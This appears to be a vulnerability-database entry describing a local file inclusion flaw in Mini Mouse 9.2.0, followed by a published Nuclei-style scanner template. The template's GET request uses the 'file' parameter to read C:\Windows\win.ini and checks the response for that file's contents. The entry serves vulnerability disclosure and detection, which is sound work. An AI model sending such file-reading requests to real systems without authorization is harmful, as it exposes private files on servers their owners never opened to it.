漏洞描述
Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
minimouse-lfi: Mini Mouse 9.2.0 - Local File Inclusion
PoC代码[已公开]
id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
reference:
- https://www.exploit-db.com/exploits/49744
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,edb,minimouse,vuln
http:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
# digest: 4a0a00473045022100ac2b4997f752660214d4738d5139a6821ad4a53912afbe73035d6f0b38cd1974022029d6e4823e78c75ae48567b91442957661cd715f99d5878ecbf27605e9ff880c:922c64590222798bb761d5b6d8e72950